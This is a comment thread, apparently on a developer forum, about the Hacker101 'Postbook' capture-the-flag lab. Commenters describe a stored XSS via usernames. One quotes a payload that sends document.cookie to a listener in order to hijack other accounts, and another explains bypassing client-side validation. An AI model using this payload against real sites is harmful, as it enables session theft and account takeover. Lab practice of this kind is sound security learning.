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Discussion on: Hacker101 CTF - Postbook

adamdry profile image
Adam Dry • Edited

Hey! I found a XSS bug that didn't lead to a flag. I create a user with a username of <script>alert('xss!')</script> and then created a post by that user.

This meant when logging as that user - or indeed another user, the JS was executed in the context of the logged in user. But there was no flag associated with it!

Do you think that's a real bug or is there something I'm missing? I've completed all 7 flags now and none of them seem to relate to XSS :/

caffiendkitten profile image
DaNeil C

Well being that these ctfs are for learning and there are specific hints aimed towards the flags I'd say that it's just a happy easter egg that you found. Go you!👍

souvikinator profile image
Souvik Kar Mahapatra

yeah even I found that and I used it to steal cookie using: <script>fetch('http://localhost:8080/?'+document.cookie)</script> it and easily logged into other accounts without username or password, however no flags found ;-;

jnpushkar1507 profile image
Pushkar Jain

Nice Finding Brother, however they have patched the same now, so username can only contain lowercase letters. but they still are using client side validation, so if you can capture the request, you can still peroform Stored XSS